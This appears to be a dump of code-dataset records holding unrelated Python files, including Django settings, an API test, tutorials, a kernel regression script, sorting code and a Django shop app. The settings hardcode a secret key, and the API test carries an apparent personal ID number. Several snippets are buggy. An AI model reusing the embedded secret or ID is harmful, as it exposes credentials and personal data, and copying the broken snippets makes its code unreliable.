discord.Guild):\n saved_combine_cat = await self.config.guild(guild).combines_category()\n for category in guild.categories:\n if category.id == saved_combine_cat:\n return category\n return None\n \n async def _save_combine_category(self, guild: discord.Guild, category: discord.CategoryChannel):\n await self.config.guild(guild).combines_category.set(category.id)\n \n # DISABLED: channel renaming\n # async def _players_per_room(self, guild):\n # ppr = await self.config.guild(guild).players_per_room()\n # return ppr if ppr else None\n\n async def _save_players_per_room(self, guild: discord.Guild, num_players: int):\n await self.config.guild(guild).players_per_room.set(num_players)\n\n async def _room_capacity(self, guild):\n cap = await self.config.guild(guild).room_capacity()\n return cap if cap else 0\n\n async def _save_room_capacity(self, guild, capacity: int):\n await self.config.guild(guild).room_capacity.set(capacity)\n\n async def _toggle_public_combine(self, guild):\n was_public = await self._is_public_combine(guild)\n await self.config.guild(guild).public_combines.set(not was_public)\n return not was_public # is_public (after call)\n\n async def _is_public_combine(self, guild):\n return await self.config.guild(guild).public_combines()\n\n async def _save_acronym(self, guild, acronym: str):\n await self.config.guild(guild).acronym.set(acronym)\n\n async def _get_acronym(self, guild):\n return await self.config.guild(guild).acronym()\n\n","sub_path":"combineRooms/combineRooms.py","file_name":"combineRooms.py","file_ext":"py","file_size_in_byte":19333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"127296719","text":"\n\nfrom xai.brain.wordbase.nouns._buzzword import _BUZZWORD\n\n#calss header\nclass _BUZZWORDS(_BUZZWORD, ):\n\tdef __init__(self,): \n\t\t_BUZZWORD.__init__(self)\n\t\tself.name = \"BUZZWORDS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"buzzword\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_buzzwords.py","file_name":"_buzzwords.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"89922080","text":"\nfrom time import sleep\nimport re\nfrom time import localtime, strftime\nimport csv\nimport subprocess\nimport filecmp\nimport os.path\nimport os\nimport sys\n\nclass AutoTest:\n def __init__(self, binName, inDir, outDir, expectDir):\n self.binName = binName\n self.inDir = inDir\n self.outDir = outDir\n self.expectDir = expectDir\n \n self.index=0\n\n def Execute(self, test):\n self.index += 1\n print (\"\\n------------------------------------------------------------------------------------\")\n print(\"Starting test case {}: {}......\".format(self.index, test.name), end= \"\")\n test.input = self.inDir + test.input \n test.output = self.outDir + test.output\n test.expected = self.expectDir + test.expected\n \n subprocess.call ([self.binName, test.cmd, test.input , test.output], stdout=subprocess.DEVNULL)\n \n if not os.path.exists(test.expected):\n print(\"\\n\", test.expected , \" Not found\")\n elif not os.path.exists(test.output):\n print(\"\\n\", test.output , \" Not found\")\n else:\n if filecmp.cmp(test.expected, test.output, shallow=False):\n print (\"Aproved!!!\")\n return True\n print (\"Failed!!\\nComparisson between {} and {} Unmatched\".format(test.output, test.expected))\n \n print(\"Failed to run: {} {} {} {}\".format(self.binName, test.cmd , test.input, test.output))\n return False\n\nclass UnitTest:\n def __init__(self, name, cmd, input, output, expected):\n self.name = name\n self.cmd = cmd\n self.input = input\n self.output = output\n self.expected = expected\n \n\nprint (\"------------------------------------------------------------------------------------\")\nprint (\" AUTO TEST STARTING \")\nprint (\"-------------------------------------------------------------------------------------\")\n\nprint (\"Starting Server ... \")\nsubprocess.Popen([str(sys.argv[1])], stdout=subprocess.DEVNULL)\n\nat = AutoTest(str(sys.argv[2]), inDir=\"test/mock/\", outDir=\"~build/x86/debug/\", expectDir=\"test/mock/expected/\")\n\ntestList = []\n\ntestList.append(UnitTest(name=\"Command Response Test \" , cmd=\"T_Command1\" , input=\"cmd1.txt\", output=\"test1.txt\", expected=\"Ret_OK.txt\"))\ntestList.append(UnitTest(name=\"Command Response Async Test \" , cmd=\"T_Command1Async\" , input=\"cmd1.txt\", output=\"test2.txt\", expected=\"Ret_OK.txt\"))\ntestList.append(UnitTest(name=\"Command Response 2 Test \" , cmd=\"T_Command2\" , input=\"n\", output=\"test3.txt\", expected=\"cmd2.txt\"))\ntestList.append(UnitTest(name=\"Event Test \" , cmd=\"T_Event1\" , input=\"cmd1.txt\", output=\"test4.txt\", expected=\"cmd2.txt\"))\n \napproved = True\nfor test in testList:\n sys.stdout.flush()\n if at.Execute(test) == False:\n approved = False\n break\n\nsys.stdout.flush()\n\nif(not approved):\n os._exit(1)\n \nprint (\"\\n------------------------------------------------------------------------------------\") \n\n\n","sub_path":"TemplateCommand/test/AutoTest.py","file_name":"AutoTest.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"173806239","text":"# Django settings for plotter project.\n\n# Note: All these settings could be overriden in local_settings.py \n# Check this possiblity when debugging. \nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\nDEVELOPMENT = False \n\nDATABASE_ENGINE = 'sqlite3' # 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\nDATABASE_NAME = '' # this is \nDATABASE_USER = '' # Not used with sqlite3.\nDATABASE_PASSWORD = '' # Not used with sqlite3.\nDATABASE_HOST = '' # Set to empty string for localhost. Not used with sqlite3.\nDATABASE_PORT = '' # Set to empty string for default. Not used with sqlite3.\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/Berlin'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'DE-de'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = ''\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = ''\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = '4t+b0ly^h7u1(!c*0b$u22wfz6tx5r=uqf1jllqe*i7@#4$v7e'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.load_template_source',\n 'django.template.loaders.app_directories.load_template_source',\n# 'django.template.loaders.eggs.load_template_source',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.middleware.doc.XViewMiddleware',\n 'plotter.middleware.restful.AcceptMiddleware',\n 'plotter.middleware.debugging.AJAXSimpleExceptionResponse',\n)\n\nROOT_URLCONF = 'plotter.urls'\n\nTEMPLATE_DIRS = (\n '/usr/share/djangoprojects/plotter/templates',\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.admin',\n 'plotter.apps.dates',\n 'plotter.apps.locations',\n)\n\n# url to the image indicating that there is no static map available \nNO_STATIC_MAP = 'http://www.condominiumsph.com/img/nomap.gif'\n\n# now import local_settings, which are not under version-control.\n# see http://mccormac.org/blog/2007/mar/28/localized-settings-django/\n# make sure there a local_settings.py file.\n# import local settings overriding the defaults\ntry:\n from local_settings import *\nexcept ImportError:\n try:\n from mod_python import apache\n apache.log_error( \"local_settings.py not set; using default settings\", apache.APLOG_NOTICE )\n except ImportError:\n import sys\n sys.stderr.write( \"local_settings.py not set; using default settings\\n\" )\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509047629","text":"import requests\nimport unittest\nimport json\n\nclass relate_loan(unittest.TestCase):\n def test_RelevanceLoanNos(self):\n url = 'https://testfatpsit01.yylending.com/'\n relaloan_path = url + 'fatp-lm-service/http/lm/account/foreign/getBatchRelevanceLoanNos'\n header = {'Content-Type':'application/json'}\n data = {\n\t \"certIds\": [\"330411199106121678\"\t],\n\t \"customerIds\": [\"CT20200414000335\"]\n }\n relate_res = requests.post(url=relaloan_path,data=json.dumps(data),headers=header)\n print('ralate : ' + relate_res.text)\n\n\n","sub_path":"case/fatp/relateLoan.py","file_name":"relateLoan.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"144560388","text":"#-*-coding: utf-8 -*-\n\n\"\"\"\n01.dictionary.py\n딕셔너리 - 이름(key)과 값(value)가 쌍을 이루는 자료 구조\n리스트 = [1,2,3]\n튜플 = (1,2,3)\n딕셔너리 = {\"a\":100}\n만들때만 다르지 부를때는 다똑같아! a[0]\n\"\"\"\n\ndic = { \"name\": \"철수\", \"phone\": \"010-9473-4201\", \"birth\":\"0115\"}\nprint(dic)\n\n#특정 원소에 접근하기\nprint(dic[\"name\"])\n\n#특정 원소의 값을 변경\ndic[\"name\"]= \"다은\"\nprint(dic[\"name\"])\n\n#존재하지 않는 키 값 사용하면 에러난다. \n#존재하지 않는 키에 값을 할당하면 추가 된다. \ndic[\"height\"]=163\nprint(dic)\n\n# 딕셔너리는 리스트나 다른 딕셔너리를 포함할 수 있다. -> 정보를 계층화해서 표현 가능함\naddr = [\"서울\", \"서초구\", \"강남대로\"]\ngrade = {\"korean\":93, \"math\":77, \"english\":82}\n\nmember = {\n\t\"userid\":\"python\", #문자열 데이터\n\t\"age\" :20,\t\t\t# 정수형 데이터\n\t\"addr\" : addr,\t\t# 리스트 데이터\n\t\"grade\" : grade\t\t# 딕셔너리 데이터\n}\n\nprint(member)\n\n#계층화된 값에 접근하기\nprint(member[\"addr\"][0])\nprint(member[\"grade\"][\"korean\"])\n\n#딕셔너리의 계층화 직접표현 #표에서 서울 대전 대구 인구수 총합계 되어있는 표를 이렇게 바꾼거임\nmydic = {\n\t'total':1962,\n\t'city':[서울,대전,대구],\n\t'population':[987,78,87],\n\t'date': {'yy':2018, 'mm':10, 'dd':12}\n}\n\n#리스트는 자료의 순서가 중요하다 \n#딕셔너리는 이름을 부르니까 순서가 안중요해. \n#키가 중복이 되면 하나 빼고 다 무시됨. 어떤 항목이 무시될지는 예측할 수 없음\n# 딕셔너리는 리스트와 다르게 자료의 순서가 중요하지 않다.\n# key는 정수형으로도 지정 가능. \nrank = {0:\"python\", 1:\"R\"}\n\n#특정원소 삭제 -> key가 1인 데이터 삭제\ndel(rank[1])\n\n#리스트의 원소가 딕셔너리가 되는 경우 -> 표 자료형\ngrade = [\n{\"딕셔너리1\":1},{\"딕셔너리2\":2},{\"딕셔너리3\":3}\n]\n","sub_path":"section03/01-dictionary.py","file_name":"01-dictionary.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"12531987","text":"import numpy as np\nimport math\nimport matplotlib.mlab as mlab\nimport matplotlib.pyplot as plt\nimport time\nimport rand\na = 1\nl = 1\nN = 2000\nh_n = 0.05\nm = lambda x: math.atan(a*x)\n\ndef Boxcar(v):\n if v < 1 and v > -1:\n return 0.5\n else:\n return 0\n\ndef Gaussian(v):\n return (1/math.sqrt(2*math.pi))*math.exp(-(v**2)/2)\n\ndef Epanechnikov(v):\n if v < 1 and v > -1:\n return 0.75*(1-v**2)\n else:\n return 0\n\ndef Tricube(v):\n if v < 1 and v > -1:\n return (70/81.0)*((1-abs(v)**3)**3)\n else:\n return 0\n\ndef reg(x, Xs, Ys):\n nominator = 0.0\n denominator = 0.0 \n for i in range(len(Xs)):\n nominator += Ys[i]*K((Xs[i]-x)/h_n)\n denominator += K((Xs[i]-x)/h_n)\n return nominator/denominator\n\nvalues = []\nrealValues = []\nregValues = []\nXs = []\n\nUmin = -2\nUmax = 2\nstep = (Umax - Umin)/float(N)\nfor i in range(N):\n x = Umin + (i * step)\n z = rand.gauss(0, l**2)\n values.append(m(x)+z)\n realValues.append(m(x))\n Xs.append(x)\n\nfor i in range(N):\n print(f'{int(i*100/float(N))}%')\n x = Umin + (i * step)\n regValues.append(reg(x, Xs, values))\nplt.plot(Xs, realValues)\nplt.plot(Xs, regValues)\nplt.show()\n","sub_path":"lab6/zad4.py","file_name":"zad4.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"606653006","text":"import random\n\n\ndef bubble_sort(items):\n # Loop for till the length of list\n for i in range(len(items)):\n swapped = False\n # Run another loop in reducing fashion, Swap the alternate element and push largest to the end\n # Each iteration will put the max element to the end\n for j in range(1, len(items) - i):\n # If current element is greater than previous then swap\n if items[j] < items[j - 1]:\n items[j], items[j - 1] = items[j - 1], items[j]\n swapped = True\n\n # Check if any swap happened, if not List is already sorted\n if not swapped:\n break;\n\n return items\n\n\n# items = [90, 80, 37, 31, 15, 10] # Average case\n# items = [10, 35, 31, 37, 80] # Already sorted - Worst case\nitems = [random.randint(0, 100) for i in range(10)] # Generate a random List\nprint(items)\nprint(\"Sorted : {}\".format(bubble_sort(items)))\n","sub_path":"DataStructures/Basics/Sorting/BubbleSort.py","file_name":"BubbleSort.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"298322504","text":"from distutils.core import setup, Extension\n\nmodule1 = Extension(\"xorhash\",\n sources=[\"xorhash.c\"],\n extra_compile_args=[\"-std=c99\"])\n\nsetup(name=\"xorhash\",\n version=\"0.0\",\n description=\"XorHash for NDN-NIC simulator\",\n ext_modules=[module1])\n","sub_path":"xorhash-c/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"246389558","text":"import numpy as np \nimport pims\nimport skimage as ski \nimport matplotlib as mpl\nimport matplotlib.pyplot as plt \nimport pandas as pd\nimport trackpy as tp\nfrom trackpy import predict\nimport pickle \nfrom scipy import interpolate\n\n\nclass Trajectory:\n \"\"\"This class represents a \\ of a particle. \n it either intakes a pandas df with frames,x,y keys from the generate_trajectories method,\n or it intakes a dict of positions, frames, and times as might come from \n the output of trajectory_instance.__dict__ (from the Trajectory class)\"\"\"\n\n def __init__(self, particledata, side):\n pdats = particledata \n\n if side=='L':\n fps = 188.04\n elif side=='R':\n fps = 190.40\n else:\n raise ValueError('side is either L or R')\n\n if isinstance(pdats, pd.DataFrame):\n self.positions = np.array([pdats['y'].values,pdats['x'].values]).T\n self.frames = np.array(pdats['frame'])\n self.times = np.array(pdats['frame'])/fps\n else: \n self.positions = pdats['positions']\n self.frames = pdats['frames']\n self.times = pdats['times']\n\n self.side = side\n self.link = None\n \n @property\n def T(self):\n return np.median(self.times)\n \n def __len__(self): \n return len(self.frames)\n \n def __eq__(self, other):\n return np.alltrue(self.positions==other.positions) and np.alltrue(self.times==other.times)\n \n def __repr__(self):\n length = np.amax(self.positions[:,1])-np.amin(self.positions[:,1])\n return self.side + ' trajectory of length %d pixel '%length + 'at median time %03f s '%self.T\n\n# load all of the trajectories larger than some size into trajectory objects \ndef generate_trajectories(frames,side,minlength=7):\n \"\"\"given a pandas df of linked features, generate a list of trajectories.\n The pandas df should contain keys 'x','y','particle','frame'\n side = 'L' or side = 'R' sets the frame rate appropriate to each.\n minlength is the minimum allowed number of observations of a particle\n for the trajectory to be included. If 7 for example, it was seen\n in 7 frames\"\"\"\n trajs = []\n for p in set(frames.particle): # particle index\n pdats = frames[frames['particle']==p] # particledata. This is the input of the trajectory class init \n ptraj = Trajectory(pdats,side)\n if len(ptraj)>=minlength:\n trajs.append(ptraj)\n return np.array(sorted(trajs,key=lambda t: t.T))\n\ndef distance_filter(trajs,dr=100):\n \"\"\" filter trajectories that do not have a long enough travel distance dr\"\"\"\n def filter_fn(traj,dr=dr):\n \"\"\"return True if the spatial length of a trajectory between start and end points exceeds dr\"\"\"\n positions = traj.positions\n mins = np.amin(positions,axis=0)\n maxs = np.amax(positions,axis=0)\n return np.linalg.norm(mins-maxs)>dr\n return np.array([t for t in trajs if filter_fn(t)])\n\ndef interp_trajectories(trajs,side):\n \"\"\" a trajectory is a sample of the continuous particle motion at a given rate.\n The left and right frame rates do not match. This function interpolates the samples\n into continous splines, then resamples the splines at a common framerate of 1000.0fps\n It is pretty slow. It will return a set of trajectories resampled at 1000.0fps. \n \n Inputs include trajs a numpy array full of Trajectory instances, and side = 'L' or 'R' \n which fixes the frame rate.\"\"\"\n if side=='L':\n fps = 188.04\n elif side=='R':\n fps = 190.40\n else:\n raise ValueError('side is either L or R')\n \n out = []\n for ind,t in enumerate(trajs):\n if ind%100==0:\n print('trajectory {} processed'.format(ind), end='\\r')\n # get particle data from t \n positions = t.__dict__['positions']\n times = t.__dict__['times']\n frames = t.__dict__['frames']\n # now interpolate these positions through time \n xterp = interpolate.interp1d(times,positions[:,0],kind='cubic')\n yterp = interpolate.interp1d(times,positions[:,1],kind='cubic')\n pos_terp = lambda t: np.array([xterp(t),yterp(t)])\n \n # now get the range of t across the trajectory \n # this is interpolating at 1000 fps from above t0 to below t1\n fps_common = 1000.0\n t0 = min(times)\n t1 = max(times)\n t02 = np.floor(t0)\n t12 = np.ceil(t1)\n otimes = np.linspace(t02,t12,(t12-t02)*fps_common)\n\n o_times = otimes[np.bitwise_and(otimes>t0,otimes 0:\n angle_diffs.append(angle_steers - angles[index - 1])\n else:\n angle_diffs.append(0)\n\n index += 1\n\n # pl.figure()\n # pl.plot(angles)\n # pl.hist(angle_diffs, bins=1000)\n # pl.show()\n\n np_times = np.array(times)\n np_angles = np.array(angles)\n np_angle_diffs = np.array(angle_diffs)\n\n output = {}\n output['time'] = np_times\n output['angles'] = np_angles\n output['angle_diffs'] = np_angle_diffs\n\n io.savemat('large-dataset.mat', output)","sub_path":"angle_time.py","file_name":"angle_time.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"24345031","text":"import requests\nfrom bs4 import BeautifulSoup as BS\nimport re\n\nheaders = \"{'User-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'}\"\nurl = 'http://www.gammatest.net/course/python'\nr = requests.get(url)\n\nsoup = BS(r.content, 'html.parser')\n#print(soup.find_all(['a', 'table']))\n#print(soup.find_all(True))\n\n#print(soup.find_all(class_=re.compile('md')))\n#print(soup.find_all('h2', string=True)) # vse h2 v kotoryh est' stroka\n\n#result = soup.find_all('h2', string=True)\n#for tag in result:\n# print(tag.text)\n\n\n#for tag in soup.find_all(True):\n# print(tag.name)\n\n#print(soup.find_all('title'))\n#print(soup.title)\n\n\n#print(soup.find_all('a'))\n#print(soup.a) # vydajot pervyj a\n\nmatch = soup.find('a', text='Перейти')\n#print(match)\n#print(match.find_next('a'))\nmatch2 = match.find_parent().find_parent().find_parent()\nchld = match2.findChildren()\nfor child in chld:\n print(child.findChildren())\n","sub_path":"032_html_Beautiful_soup.py","file_name":"032_html_Beautiful_soup.py","file_ext":"py","file_size_in_byte":983,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"390843691","text":"#Yr5_HBL_(e)\n#Zhan Yuli\n\nuname = input(\"Username search:\")\n\n#Test data\ndata = [[\"Wzc\",100],[\"Sk\",100],[\"wcm\",20],[\"zyl\",200]]\n\nfound = False\n#Linear search\nfor i in range(0,len(data)):\n\tif data[i][0] == uname:\n\t\tprint(data[i][0],data[i][1])\n\t\tfound = True\n\nif not found:\n\tprint(\"Username not found.\")\n\n","sub_path":"Yr5_HBL_e.py","file_name":"Yr5_HBL_e.py","file_ext":"py","file_size_in_byte":302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"614003121","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponse,HttpResponseRedirect\nfrom django.utils import timezone\nfrom django.utils.crypto import get_random_string\nfrom order.models import (\n ShopCart, ShopCartForm, OrderForm,\n OrderInfo, OrderProduct, PaymentForm,\n Payment,Variants,Wishlist,WishlistForm\n)\nfrom user.models import UserProfile\nfrom home.models import Product\nfrom django.core.paginator import Paginator,EmptyPage,PageNotAnInteger\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist, MultipleObjectsReturned\n\n# for debit card condition\nfrom itertools import groupby\nimport re\n\n@login_required(login_url='/')\ndef addtoshopcart(request,id):\n url = request.META.get('HTTP_REFERER')\n current_user = request.user\n variantid = request.POST.get('variantid')\n checkvariant = ShopCart.objects.filter(variant_id=variantid)\n\n checkproduct = ShopCart.objects.filter(product_id=id)\n if checkproduct and checkvariant:\n control = 1\n else:\n control = 0\n\n if request.method =='POST':\n form =ShopCartForm(request.POST)\n if form.is_valid():\n if control == 1:\n try:\n data = get_object_or_404(ShopCart,product_id=id)\n data.quantity += form.cleaned_data['quantity']\n data.save()\n \n except (ObjectDoesNotExist, MultipleObjectsReturned):\n messages.error(request,'it is minimum order, Plese select other order')\n return HttpResponseRedirect('/')\n\n else:\n data = ShopCart()\n data.user_id = current_user.id\n data.product_id = id\n data.variant_id = variantid\n data.quantity = form.cleaned_data['quantity']\n data.save()\n return HttpResponseRedirect(url)\n else:\n if control == 1:\n data = ShopCart.objects.get(product_id=id)\n data.quantity +=1\n data.save()\n else:\n data =ShopCart()\n data.user_id = current_user.id\n data.product_id = id\n data.quantity = 1\n data.variant_id=None\n data.save()\n return HttpResponseRedirect(url)\n \n\ndef shopcart(request):\n product = Product.objects.all()\n current_user = request.user\n shpcart = ShopCart.objects.filter(user_id = current_user.id)\n if request.method =='POST':\n comment = request.POST['comment']\n add = shpcart(comment=comment)\n add.save()\n page = request.GET.get('page',1)\n\n paginator = Paginator(shpcart,4) #pagination start in search page\n try:\n shpcart = paginator.page(page)\n except PageNotAnInteger:\n shpcart = paginator.page(1)\n except EmptyPage:\n shpcart = paginator.page(paginator.num_pages)\n\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n total = 0\n for ps in shpcart:\n if ps.product.variant == 'None':\n total += ps.product.price * ps.quantity\n else:\n total += ps.variant.price * ps.quantity\n \n context = {'shpcart':shpcart, 'total':total,'product':product}\n return render(request,'shop_cart.html',context)\n\n\ndef addtowishlist(request, id):\n url = request.META.get('HTTP_REFERER')\n current_user = request.user\n checkproduct = Wishlist.objects.filter(product_id=id)\n\n if checkproduct:\n control = 1\n else:\n control = 0\n\n if request.method =='POST':\n form =WishlistForm(request.POST)\n if form.is_valid():\n if control == 1:\n data = Wishlist.objects.get(product_id=id)\n data.save()\n\n else:\n data = Wishlist()\n data.user_id = current_user.id\n data.product_id = id\n data.save()\n return HttpResponseRedirect('/order/wishlist')\n else:\n if control == 1:\n data = Wishlist.objects.get(product_id=id)\n data.quantity +=1\n data.save()\n else:\n data =ShopCart()\n data.user_id = current_user.id\n data.product_id = id\n data.quantity = 1 \n data.save()\n return HttpResponseRedirect(url)\n\n\ndef wishlist(request):\n product = Product.objects.all()\n current_user = request.user \n count = Wishlist.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n messages.error(request,\"You have no product in wishlist\")\n return HttpResponseRedirect('/')\n \n else:\n profile = UserProfile.objects.get(user_id = current_user.id)\n shpcart = Wishlist.objects.filter(user_id = current_user.id)\n context = {'product':product, 'shpcart':shpcart,'profile':profile}\n return render(request,'wishlist.html',context)\n\n\n\ndef deletefromcart(request,id):\n ShopCart.objects.filter(id=id).delete()\n messages.success(request,\"Your item deleted form ShopCart\")\n return HttpResponseRedirect('/shopcart/')\n\ndef deletefromwishlist(request,id):\n Wishlist.objects.filter(id=id).delete()\n messages.success(request,\"Your item deleted form ShopCart\")\n return HttpResponseRedirect('/order/wishlist')\n\n\ndef checkout(request):\n current_user = request.user\n shopcart = ShopCart.objects.filter(user_id = current_user.id)\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n total = 0\n for ps in shopcart:\n if ps.product.variant == 'None':\n total += ps.product.price * ps.quantity\n else:\n total += ps.variant.price * ps.quantity\n \n if request.method =='POST':\n form = OrderForm(request.POST)\n if form.is_valid():\n data = OrderInfo()\n data.first_name = form.cleaned_data['first_name']\n data.last_name = form.cleaned_data['last_name']\n data.email = form.cleaned_data['email']\n data.address = form.cleaned_data['address']\n data.country = form.cleaned_data['country']\n data.city = form.cleaned_data['city']\n data.phone = form.cleaned_data['phone']\n data.address = form.cleaned_data['address']\n data.user_id = current_user.id\n data.total = total\n ordercode = get_random_string(5).upper()\n data.code = ordercode\n data.save()\n\n schopcart = ShopCart.objects.filter(user_id=current_user.id)\n for ps in schopcart:\n detail = OrderProduct()\n detail.order_id = data.id\n detail.product_id = ps.product_id\n detail.user_id = current_user.id\n detail.quantity = ps.quantity\n\n if ps.product.variant == 'None':\n detail.price = ps.product.price\n else:\n detail.price = ps.variant.price\n\n detail.variant_id = ps.variant_id\n\n if ps.product.variant == 'None':\n detail.amount = ps.amount\n else:\n detail.amount = ps.varamount\n detail.save()\n\n if ps.product.variant == 'None': \n product = Product.objects.get(id=ps.product_id)\n product.save()\n \n else:\n variant = Variants.objects.get(id=ps.product_id)\n variant.quantity -= ps.quantity\n variant.save()\n\n \n messages.success(request, 'Your Order has been completed. Thakes You')\n return HttpResponseRedirect(\"/order/payment\")\n \n else:\n messages.warning(request, form.errors)\n return HttpResponseRedirect(\"/order/checkout\")\n\n form = OrderForm()\n shopcart = ShopCart.objects.filter(user_id = current_user.id)\n order = OrderProduct.objects.filter(user_id = current_user.id)\n profile = UserProfile.objects.get(user_id=current_user.id)\n context = {'order':order,\n 'shopcart':shopcart,\n 'profile':profile,\n 'form':form,\n 'total':total}\n return render(request,'checkout.html',context)\n\n\n\ndef payment(request):\n current_user= request.user\n order = ShopCart.objects.filter(user_id = current_user.id)\n profile = UserProfile.objects.get(user_id=current_user.id)\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n add_value = 0\n for ps in order:\n add_value += int(ps.price) * ps.quantity\n\n if request.method =='POST':\n card_number = request.POST['card_number']\n full_name = request.POST['full_name']\n last_month = request.POST['last_month']\n cvc = request.POST['cvc']\n\n if len(card_number) <= 11 or len(card_number) >= 13:\n messages.error(request,\"Card Number is not correct\")\n elif len(full_name) <= 5:\n messages.error(request,\"Please enter more than 6 letter not correct\")\n\n return HttpResponseRedirect('/order/payment')\n\n data = Payment(card_number=card_number, full_name=full_name, last_month=last_month,cvc=cvc)\n data.save()\n messages.success(request, 'Your Order has been completed. Thakes You')\n return HttpResponseRedirect(\"/order/review\")\n\n \n context = {'order':order,'profile':profile,'add_value':add_value,}\n return render(request,'payment.html',context)\n\n\ndef review(request):\n current_user = request.user\n shopcart = ShopCart.objects.filter(user_id = current_user.id)\n profile = UserProfile.objects.filter(user_id = current_user.id)\n payment = Payment.objects.filter(create_at__lte=timezone.now()).order_by('create_at')[:1]\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n total = 0\n for ps in shopcart:\n if ps.product.variant == 'None':\n total += ps.product.price * ps.quantity\n else:\n total += ps.variant.price * ps.quantity\n\n context = {'payment':payment,\n 'shopcart':shopcart,\n 'total':total,\n 'profile':profile}\n return render(request,'review.html',context)\n\ndef thanku(request):\n current_user = request.user\n count = ShopCart.objects.filter(user_id = current_user.id).count()\n\n if count == 0: \n return HttpResponseRedirect('/')\n else:\n ShopCart.objects.filter(user_id=current_user.id).delete()\n\n request.session['cart_items'] = 0\n context = {\n 'shopcart':shopcart,\n }\n return render(request,'thanku.html',context)","sub_path":"Ecomerce new/order/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"512550107","text":"import tkinter as tk\n\nclass Popup(tk.Toplevel):\n\tdef __init__(self,master):\n\t\ttk.Toplevel.__init__(self,master)\n\t\tself.master = master\n\t\tself.resizable(width=False,height=False)\n\t\tself.wm_title('Head Pose Option')\n\n\t\tself.headPoseOption = tk.StringVar(value = 'hopenet')\n\n\n\t\thopenet = tk.Radiobutton(self,text='HopeNet',variable=self.headPoseOption,value='hopenet',height=5,width=30,command= lambda:logger.info('HopeNet head pose estimator is selected'))\n\t\tdeepgaze = tk.Radiobutton(self,text='DeepGaze',variable=self.headPoseOption,value='deepgaze',height=5,width=30,command= lambda:logger.info('DeepGaze head pose estimator is selected'))\n\n\t\thopenet.pack()\n\t\tdeepgaze.pack()\n\n\t\tself.focus()\n\nif __name__ == '__main__':\n\troot = tk.Tk()\n\tpopup = 